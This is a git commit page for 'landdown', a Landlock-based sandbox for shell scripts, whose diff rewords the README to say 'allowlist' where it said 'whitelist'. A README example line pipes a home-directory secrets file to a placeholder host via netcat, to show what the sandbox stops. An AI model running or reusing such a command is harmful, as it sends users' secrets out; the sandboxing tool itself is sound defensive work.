landdown

Simple Sandboxing for shell scripts.

git clone git://mccd.space/landdown

commit d827a04054cd5363e1167686a548a5cdd8d4936b
parent 6ea799b4ef145ab5137ce5b4712085a3821f2de4
Author: Marc <marc@coquand.email>
Date:   Tue, 31 Mar 2026 18:57:50 +0200

Remove whitelist -> allowlist

Diffstat:
MREADME.md | 6+++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
@@ -1,6 +1,6 @@
 # Landdown - Simple shell script sandbox
 
-A minimal Linux utility tool for sandboxing shell scripts using [landlock](https://landlock.io). To use, prepend your script with landdown and rules. For example:
+An ergonomic Linux utility for sandboxing shell scripts using [landlock](https://landlock.io). To use, prepend your script with landdown and allow list. For example:
 
 ```sh
 #!/usr/bin/env landdown
@@ -13,7 +13,7 @@ echo "Hi"
 cat $HOME/my-secrets | nc exploit.com 1337
 ```
 
-landdown locks down file and network access of a script and only allows whitelisted rules.
+landdown locks down file and network access of a script to the allowlist.
 
 The syntax is:
 
@@ -45,7 +45,7 @@ echo Edit > /tmp/some-file.txt
 
 Try removing `rwf /tmp/some-file.txt` and the script should fail.
 
-Note: the file need to exist in order for landlock to work, run `touch /tmp/some-file.txt` to test.
+Note: the file need to exist in order for landdown to work, run `touch /tmp/some-file.txt` to test.
 
 ### Curl